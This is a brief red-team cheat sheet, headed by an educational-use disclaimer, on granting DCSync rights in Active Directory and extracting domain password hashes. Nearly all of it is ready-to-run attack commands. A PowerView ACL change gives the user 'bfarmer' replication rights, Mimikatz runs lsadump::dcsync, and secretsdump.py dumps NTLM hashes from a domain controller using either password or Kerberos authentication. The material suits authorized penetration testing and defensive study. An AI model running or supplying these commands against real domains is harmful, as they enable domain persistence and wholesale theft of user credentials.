Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
Introduction
Granting DCSync privileges allows a user to replicate domain data, which includes sensitive information such as password hashes.
Steps to Grant DCSync Privileges
-
Grant DCSync privileges using PowerView:
Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
-
Perform a DCSync attack with Mimikatz:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:[DOMAINNAME]\[ANYDOMAINUSER]"'
-
Run DCSync using NTLM authentication:
secretsdump.py [DOMAIN]/[USERNAME]:[PASSWORD]@[IP_ADDRESS] -just-dc-ntlm
-
Run secretsdump.py with Kerberos authentication:
secretsdump.py -no-pass -k <Domain>/<Username>@<DC_IP_or_FQDN> -just-dc-ntlm